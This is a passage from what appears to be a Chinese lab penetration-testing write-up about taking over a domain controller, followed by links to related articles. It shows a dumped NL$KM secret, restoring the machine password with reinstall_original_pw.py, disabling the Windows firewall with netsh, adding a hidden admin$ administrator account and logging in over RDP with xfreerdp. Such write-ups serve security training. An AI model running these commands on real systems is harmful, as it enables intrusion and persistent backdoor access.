[*] NL$KM 0000 10 B9 B5 A6 0D 04 15 CD A3 0C 9D 55 4E 86 23 9E ...........UN.#.0010 7A 14 5D F1 2C 6D 90 AB 0F D5 BC 9B 9E B3 EB 76 z.].,m.........v0020 09 79 A5 03 19 DF 60 8A 82 6F AB 2B 68 C1 E7 DB .y....`..o.+h...0030 29 21 10 1D D1 44 CF D6 35 26 F6 14 40 7E 8B B0 )!...D..5&..@~..
NL$KM:10b9b5a60d0415cda30c9d554e86239e7a145df12c6d90ab0fd5bc9b9eb3eb760979a50319df608a826fab2b68c1e7db2921101dd144cfd63526f614407e8bb0
[*] Cleaning up...
使用 reinstall_original_pw.py
恢复密码
proxychains4 python3 reinstall_original_pw.py ad 10.10.10.135 63dea6de1590fd5bf9e0e1531aa9d0a2
在经过许久的等待后,成功恢复密码。
RDP 登录域控截屏纪念
关闭防火墙
netsh advfirewall set allprofiles state off #关闭防火墙
netsh advfirewall show allprofiles #查看防火墙状态
添加隐藏管理员账号
shell net user admin$ QWEasd123 /add && net localgroup administrators admin$ /add
xfreerdp 登录域管
如果连接不上可能是防火墙的问题。
proxychains4 xfreerdp /u:admin$ /p:QWEasd123 /v:10.10.10.135
项目总结
这个项目在内网方面不是很难,难的是反序列化利用。
所以说安全与开放缺一不可。
scaner 从外网到内网域渗透相关推荐
- scaner从外网到内网域渗透笔记
scaner 从外网到内网域渗透 1.环境配置 1.1靶场信息 用到的虚拟机共有三个 分别是 12server-db .12-dc .web1 12server-db.web1 这两个可以使用桥接或者 ...
- 华为防火墙USG6000V---内网访问外网---外网访问内网服务器(NAT服务器)示例配置
目录 一.配置要求 二.配置步骤 1. ping通防火墙接口IP地址的条件 2. 内网ping通外网终端的条件 3. 内网ping通DMZ(内网服务器)的条件 三.命令解析 一.配置要求 内网可以pi ...
- 工控攻防演示——从外网到内网控制系统设备的入侵
给实验室写的文章,在安全客上发表,在这里再发下 一.概述 实验目的通过工控靶场学习web渗透.内网渗透.工控安全相关知识技能. 靶场信息本实验通过vmware 搭建了靶场的外网和内网环境,在内网环境中 ...
- 让外网访问内网Ngrok工具
让外网访问内网,通常一些开发的情况下会遇到这种问题,这里记录一个软件工具ngrok. 通常微信客户端,自己做测试可以直接配上本地地址用: 本地做测试服务,连调外网.这个网上有下载地址:https:// ...
- netscreen 25配置外网到内网的Webserver实践
本人所在的公司是通过ADSL上网的,同时为保证企业数据安全添置了一台netscreen 25的防火墙,其实公司目前并没有网上相关的应用(以前一台DLink 604的ADSL路由器就已经够用啦),关键是 ...
- 外网访问内网Tornado
为什么80%的码农都做不了架构师?>>> 外网访问内网Tornado 本地安装了Tornado,只能在局域网内访问,怎样从外网也能访问本地Tornado? 本文将介绍具体的实现 ...
- 解决外网与内网或内网之间的通信,NAT穿透
在网络编码中会发现程序在局域网中是可以适用的,但是在外网与内网之间和内网与内网之间就不可行. 问题就在于NAT.首先介绍下NAT. NAT的作用NAT(Network Address Translat ...
- ssh外网访问内网服务器
现在有这样一个情况,实验室有自己的服务器(内网),并且有相关老师进行维护(公网),我们可以在内网用内网ip访问服务器,如果我们在家里只能通过公网进行登录.但是我在实验室有一个小服务器(内网),如果我在 ...
- 外网访问内网(内网穿透)
什么是内网穿透 内网穿透,即NAT穿透,网络连接时术语,计算机是局域网内时,外网与内网的计算机节点需要连接通信,有时就会出现不支持内网穿透.就是说映射端口,能让外网的电脑找到处于内网的电脑,提高下载速 ...
最新文章
- 一文带你看懂Springboot核心功能及优缺点
- Adam真的是最好的优化器吗?
- multinormalNB多项式朴素贝叶斯原理及代码
- Python 正在从简明转向臃肿,从实用转向媚俗
- Android Studio离线打包5+SDK
- c语言边序列构造邻接表,结构C语言版期末考试考试(有答案).doc
- TransE:Translating Embedding多元关系数据嵌入(知识图谱嵌入)2013 NIPS
- Q205 同构字符串
- BZOJ 2049: [Sdoi2008]Cave 洞穴勘测——LCT
- Codeforces Round #302 (Div. 2)
- jsx怎么往js里传参数_JSX语法使用详解——终极版
- Mac用户如何在Deckset中使用Ulysses?
- Macbook安装brew
- java开始到熟悉100-102
- QQ客服代码(支持临时会话设置)
- 图片清晰度差怎么修复成高清图片
- 安卓开发学习5-6:布局管理器:布局管理器嵌套
- android修行之路----经典书籍
- 【渝粤题库】陕西师范大学201611《中国古代文学(四)》作业
- 数字图像处理|Matlab-数字图像编码实验-无损编码/压缩算法实验-实现行程编码压缩, 计算原图和压缩以后的尺寸,计算压缩率并比较分析